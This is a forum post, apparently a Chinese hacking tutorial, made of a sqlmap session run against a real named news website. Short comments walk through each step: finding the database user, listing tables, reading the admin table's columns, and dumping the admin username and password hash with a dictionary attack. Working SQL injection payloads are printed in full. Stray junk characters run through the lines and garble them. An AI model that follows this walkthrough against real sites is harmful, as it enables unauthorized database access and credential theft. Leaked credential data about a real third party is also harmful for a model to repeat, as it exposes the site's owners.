D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
; @$ u) L/ m, T3 J8 v/ d/ t4 Xms "Mysql" --current-user /* 注解:获取当前用户名称
& J V! j) O1 `" e$ q; s5 s4 ~ sqlmap/0.9 - automatic SQL injection and database takeover tool
& j0 M4 O) C4 Q1 {3 S http://sqlmap.sourceforge.net starting at: 16:53:54: X( i, F' C% [# h. P
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
3 ]7 v& h- }, S/ Q; n session file7 r8 s+ s5 n5 B/ C6 t. S
[16:53:54] [INFO] resuming injection data from session file! q, i2 w! `# J3 T" E
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file* [3 ^$ I% m; b% a6 ^! A3 D
[16:53:54] [INFO] testing connection to the target url- Z4 ~5 S$ ~ r1 N5 F' h
sqlmap identified the following injection points with a total of 0 HTTP(s) reque1 z4 z/ w9 f j
sts:2 f/ ~0 B+ H) ^8 w3 u, l$ Q; R1 i
---
3 b) J7 c9 }1 G- |* ~/ kPlace: GET$ e5 I0 j+ C8 _
Parameter: id8 H3 h# Q0 {6 }$ @3 Y* S/ M
Type: boolean-based blind# R: }( ^% g8 e( L( X( `
Title: AND boolean-based blind - WHERE or HAVING clause
4 u# _* Q2 u1 I Payload: id=276 AND 799=799. F* r% @# D; e0 j
Type: error-based
( i) D4 K$ a! Y: A, G/ L0 ] Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause4 q- a! v Z4 E; Y4 W+ h
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
4 j; X" e. `/ l# j* `$ h8 Z+ D- u120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
+ g$ S0 V) Q, R$ n. }),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)- n5 i S" Y2 `0 P. v
Type: UNION query
) q0 V* f* b# w$ m$ i0 U Title: MySQL UNION query (NULL) - 1 to 10 columns) @3 ^ c6 a8 q" n9 F* q A/ m
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
; W* k4 r! A5 k' r, J(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
7 ^6 b! z7 h- {) Z* L" c! R: @2 }7 {CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
$ J! U5 v8 `9 H7 x7 Z- u0 Y Type: AND/OR time-based blind3 \& f3 J0 `" z% E- N/ f" c$ [
Title: MySQL > 5.0.11 AND time-based blind
; G9 S( a) N" W Payload: id=276 AND SLEEP(5)* s0 i* M6 |3 U+ w. [+ F) U$ F
---
% X4 n6 V5 i/ [5 c) v1 K% O/ F[16:53:55] [INFO] the back-end DBMS is MySQL6 Y9 X6 K+ r' S# O; \
web server operating system: Windows' b+ ?. d; ]3 D* Z- `/ `
web application technology: Apache 2.2.11, PHP 5.3.02 b/ @5 w: H) n$ |1 V( @
back-end DBMS: MySQL 5.07 f: i9 J' H0 {/ {
[16:53:55] [INFO] fetching current user
/ B0 j% K/ ~( o; Q9 fcurrent user: 'root@localhost' 8 Q8 i4 {/ f2 K
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou8 b! `5 x q( I" G6 B* H3 h/ A) N
tput\www.wepost.com.hk' shutting down at: 16:53:583 j; O& G# r# K7 m- P, ]
# ~8 p0 ^9 a, x
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
; L! z+ D2 I, W; [: d+ mms "Mysql" --current-db /*当前数据库
# i5 s3 Y6 Y# J" m& r+ P. y" h( X sqlmap/0.9 - automatic SQL injection and database takeover tool+ C7 D+ A p8 f
http://sqlmap.sourceforge.net starting at: 16:54:16
! K2 W) A6 U& _2 F& ][16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as6 L [! W8 N% j! n( ~! b
session file ~" w9 q) r! W
[16:54:16] [INFO] resuming injection data from session file
. u3 r1 t# ?1 f' {0 _+ F[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
) w% ^) W: B% V2 D* {6 F; l- H[16:54:16] [INFO] testing connection to the target url
$ W+ t7 C$ y, g: p* Q; D: Usqlmap identified the following injection points with a total of 0 HTTP(s) reque
0 w$ y6 l* Q4 E7 h& vsts:
# u; U' v: B: j# F3 `7 k' k5 [& D---
0 A, h" T6 {3 N, f3 LPlace: GET1 x6 S& c) d' V, Z3 s1 ?
Parameter: id
- |; W5 ?, e9 M7 y Q Type: boolean-based blind
# ]9 X* x; w( `2 m7 x4 d Title: AND boolean-based blind - WHERE or HAVING clause, x. I, B/ G9 m2 m) R9 V
Payload: id=276 AND 799=799, E' I/ A* p+ i# s: B
Type: error-based% F# w6 l, y- l6 }7 U4 p# u
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
7 Q& y( X' p1 H7 s Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,% s5 ^3 x, C" N
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
3 y/ y3 x: n7 C0 h),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)9 f3 G1 q9 b2 f7 A+ Y* G* n! d
Type: UNION query
% t5 K. ^8 z5 t, h0 p/ S. l Title: MySQL UNION query (NULL) - 1 to 10 columns
" U% h' D, n3 v* @, Q0 J Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR0 }4 u4 b* V+ v3 V+ F9 [, z% P
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
. x/ N1 ^+ i$ vCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#: J7 v- y' T2 @7 H
Type: AND/OR time-based blind
) t. I4 n7 I( B" N* o- o6 f2 U+ K' e Title: MySQL > 5.0.11 AND time-based blind! `! V% B4 f8 k) R- B; S
Payload: id=276 AND SLEEP(5)
2 d W$ E0 i) @6 b# B---: S0 F8 P* _, u; ?5 o) Y! E a) K
[16:54:17] [INFO] the back-end DBMS is MySQL; x/ f' R" G* K, N. R3 W7 m
web server operating system: Windows
' v$ D4 G+ d6 u8 V6 aweb application technology: Apache 2.2.11, PHP 5.3.08 S% X2 `& U* a# W4 W. j
back-end DBMS: MySQL 5.03 A" Z0 e( d Q+ r. e K
[16:54:17] [INFO] fetching current database
, U9 U' |( X( r3 i! Xcurrent database: 'wepost'
) d2 i$ J0 V% U2 n[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
& u! G) N# O: {. ^' v2 J4 Ztput\www.wepost.com.hk' shutting down at: 16:54:18- l" ^$ n: y# l$ ^7 @! ~
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db5 h/ `6 ?4 S! L; V2 P
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
& e8 ^' u# l" d9 a sqlmap/0.9 - automatic SQL injection and database takeover tool
, Y2 d3 b- N0 b9 [0 K http://sqlmap.sourceforge.net starting at: 16:55:25# e j. `: B) x: q7 S6 V, Y, _
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
: H! I% J# {1 R" w) }* ~ session file
3 W2 r" g) z% ^3 f7 z0 R: [[16:55:25] [INFO] resuming injection data from session file$ N- t. ?5 G7 `+ }) @' U7 j+ T6 s4 S
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file; v0 W: d* b4 v7 V& r: P
[16:55:25] [INFO] testing connection to the target url
6 U) |. |* D, rsqlmap identified the following injection points with a total of 0 HTTP(s) reque
/ M* u& }/ W/ b2 }. J5 Ests:/ j2 Z! y1 \3 x, T1 }
---2 V1 x. K6 z- T0 J5 {
Place: GET
, {( S2 h0 R- U9 [: V! O: L& m, \6 VParameter: id
3 ]3 `5 D( M- v n' v1 ` Type: boolean-based blind
( ]1 L) R9 W# p( n/ k1 ^& Q5 K* c Title: AND boolean-based blind - WHERE or HAVING clause+ v0 a8 M( E6 b6 U8 K5 y
Payload: id=276 AND 799=799
( W) d4 O2 V* _9 h9 e- A0 d& m Type: error-based
4 r7 M1 C. {; G: Z3 P Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
( f4 N. B4 C, K5 [ Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
8 Q# H) r' i% l# m7 A5 V9 \2 F120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
1 Y( W1 }! H. \, ^! y),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
0 A# W8 L" e$ O$ \; p Type: UNION query$ L- O* @' w& `# K
Title: MySQL UNION query (NULL) - 1 to 10 columns Z4 I3 j0 Z. u* v
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR) r; q3 T" f% \ R8 A' N
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
l' c* l5 r3 @9 v s2 m8 NCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL## {+ D* Q, ~6 r- x6 ]
Type: AND/OR time-based blind
( G U2 |; S% c Title: MySQL > 5.0.11 AND time-based blind5 z' Y& p8 s' q" ^% K8 J
Payload: id=276 AND SLEEP(5)8 h: q* ~& X$ M7 F5 ^( s
---2 K* o4 e, I/ g7 O; e
[16:55:26] [INFO] the back-end DBMS is MySQL
( {" d% t; d' ]2 }% W% ^web server operating system: Windows
- C' S4 N* t2 J5 vweb application technology: Apache 2.2.11, PHP 5.3.0
! R- B2 A" b5 ]8 d7 Nback-end DBMS: MySQL 5.08 G( g; \; [+ Q4 K0 k& F) f
[16:55:26] [INFO] fetching tables for database 'wepost'
' h! Y. B M4 q6 }( x7 c7 w[16:55:27] [INFO] the SQL query used returns 6 entries0 u8 s" Y. u" n+ Y1 G" Q8 }& e
Database: wepost; }! n" M0 A! T
[6 tables] p( C# d5 }. l3 x# H
+-------------+% }! W3 P8 K: O2 z6 V; H; i
| admin |% v' J8 k) Z% `5 b( j
| article |- N: ?, N3 y- V j$ s9 T
| contributor |
+ t/ r! J' g4 ?1 ~5 E( A. M| idea |
( M8 M2 R1 t* U6 s$ Q C; ?| image |7 b! \3 [. {4 ~' {
| issue |( _% e- O) I" q; B
+-------------+5 i' f' U3 x: @+ b4 ~
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
& z8 D b3 V6 H& ]- Ltput\www.wepost.com.hk' shutting down at: 16:55:335 A6 Q# [0 Z, g z
' t# f+ E$ g: ]' z" U3 Q% P/ oD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
3 U! U$ j+ @" S z: ems "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名* ^* b$ n# a; R1 ^
sqlmap/0.9 - automatic SQL injection and database takeover tool `( C. ?& S+ h, v* w: {
http://sqlmap.sourceforge.net starting at: 16:56:06
+ r7 e1 o4 R0 Fsqlmap identified the following injection points with a total of 0 HTTP(s) reque
8 J+ ?+ s! K- p* {2 Hsts:9 o4 e* g" Z' |! u) L' ?. @3 I
---
. B. Z) d# K# R5 ^Place: GET
& u& N- F# ], _7 W/ AParameter: id% p# r) D; }4 p) J% `8 f
Type: boolean-based blind
# w- w( ]: i4 X z% z4 H Title: AND boolean-based blind - WHERE or HAVING clause
! b- m ~% \9 l$ M/ q& W( { Payload: id=276 AND 799=799
& J2 z2 `$ |- _ Type: error-based* l7 c. H2 `! R6 o
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
! R6 _/ Z; S3 b% U$ g6 U. d Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
. X/ w0 d9 H' u, E120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58# N/ \& I* K% ?* x6 ~' S& j
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
6 U+ ~) [- ^/ }; y- B3 P Type: UNION query, x' U5 v4 g! `# o6 q: e; E) A3 g
Title: MySQL UNION query (NULL) - 1 to 10 columns
, ^2 q' Q! u1 {" k6 l7 H# l9 G Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR, I- l$ I) [- J8 e/ e- w
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
* z; ]& l7 E- u* `; i8 o4 [9 rCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
7 I! o$ a: f4 q$ z$ t$ A Type: AND/OR time-based blind
) w: [! P! N; M* z Title: MySQL > 5.0.11 AND time-based blind" ?( O9 s0 V; k9 d0 U, [
Payload: id=276 AND SLEEP(5)
7 D' m- d3 j! {4 V4 `; b---
% i& m1 H2 [) F/ i- E6 Z$ W$ n) Z9 rweb server operating system: Windows
% D# ^" H! |! V8 ]. e% Dweb application technology: Apache 2.2.11, PHP 5.3.0
4 f. x9 b6 F$ A1 {. |1 u: qback-end DBMS: MySQL 5.0& Q" i$ b+ [7 g" n4 ?/ y+ C
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
/ m( t: i F1 G# Wssion': wepost, wepost( f+ W! Y+ T! ]5 T5 A0 e6 u
Database: wepost4 O, g. D- e6 a5 `
Table: admin
, H5 [7 G; J: c( P[4 columns]
0 h: {) \- }3 M& D+----------+-------------+
: C! E$ L) M" [+ v9 F' ^/ T) r Q| Column | Type |' ~2 w0 B9 H7 Z0 B/ f$ a( g
+----------+-------------+3 { g. Y v( r/ d
| id | int(11) |% {0 L% j _0 a0 ~4 z d
| password | varchar(32) |
# q7 h0 {" B6 V! W+ W9 I| type | varchar(10) |6 W$ \9 E$ d1 w) p. p
| userid | varchar(20) |2 {( Q3 }- H/ J1 f6 G
+----------+-------------+. G" K5 y. A* O; K/ {7 J/ @! r; n
shutting down at: 16:56:19% Z2 j/ i! E# Y) e% ~4 B0 u) C
9 A7 D. x- N( T% Z, J0 u5 CD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
, l9 y$ N: c5 x9 l& C2 n, bms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
( G5 a4 O+ e' Q; L3 e! q sqlmap/0.9 - automatic SQL injection and database takeover tool
* O: I6 Z. Y& j: x1 a5 ]5 m http://sqlmap.sourceforge.net starting at: 16:57:14
. k2 A/ X" u* j! U' Usqlmap identified the following injection points with a total of 0 HTTP(s) reque
6 ~$ W$ u: ~& w/ G- N, o: _" i0 lsts:% p& E' D+ m* g2 J
---' J, x" c2 Y3 @
Place: GET
! H0 ]. t6 I/ F( |2 q/ J& s9 DParameter: id
4 Z o/ X2 E. {% }! W& [" E Type: boolean-based blind
( [: C$ |7 M4 t) D Title: AND boolean-based blind - WHERE or HAVING clause
) ~) D$ X# @& v5 n- R Payload: id=276 AND 799=799
0 {. J/ j7 I/ M& v0 x+ A$ \ Type: error-based
: O3 F6 I1 t2 X3 Q Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause- @0 I# H Z% g: K3 C- P. }5 F
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118, r' G% {) V+ E- g& E4 b: r9 k
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,581 E7 Y2 ~- |% M5 {: [. R; A
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
# R! F. H. a4 f7 K7 M Type: UNION query/ J( e3 @' b) M" I7 a* r
Title: MySQL UNION query (NULL) - 1 to 10 columns
. u b8 i2 Q2 f1 I) M0 b3 r Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
6 _4 |$ {6 {& S- O# W" L(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
' U: h6 n( e3 }! r0 XCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
4 I1 c5 z$ s" c; B% d Type: AND/OR time-based blind
: S% S% Z( {+ M& n! {* W Title: MySQL > 5.0.11 AND time-based blind9 t( b# F! n9 m F2 c7 U
Payload: id=276 AND SLEEP(5)
) x, R" q0 b9 H1 F" M4 @' D---. }7 v0 m% I- h8 f6 a. ]! @
web server operating system: Windows
1 D6 k% N7 j% Fweb application technology: Apache 2.2.11, PHP 5.3.0
9 m; k! \. h1 b: @, eback-end DBMS: MySQL 5.0
) W0 }7 a! X& Y. P! i6 S, Srecognized possible password hash values. do you want to use dictionary attack o9 J/ q/ `' C1 l: x( u0 x
n retrieved table items? [Y/n/q] y
# X1 a; e, j: d, vwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
& H6 ~* F2 f0 x) Mdo you want to use common password suffixes? (slow!) [y/N] y/ m3 y1 H6 {4 ~$ h) u \. J
Database: wepost! h! ~ D8 d3 z: n W
Table: admin
" u f5 C3 S7 N& P; j2 U7 \[1 entry]
/ b- M- L" b- q) o; a% c& d. ~+----------------------------------+------------+
: w( w: U( O+ v2 k! ?| password | userid |+ D- _2 c1 a4 q5 ?& A
+----------------------------------+------------+( J, y" b. w+ _+ R; a* {- t
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |" k& W0 ~8 z8 D v% V2 q t) A5 q
+----------------------------------+------------+4 G6 [0 q/ T3 Q
shutting down at: 16:58:14
! k8 m1 C) m8 ?; ]0 \
5 U y) p. K( N+ _' X5 ^$ }D:\Python27\sqlmap> |
发表于 2013-4-4 22:18:49
收藏
支持
反对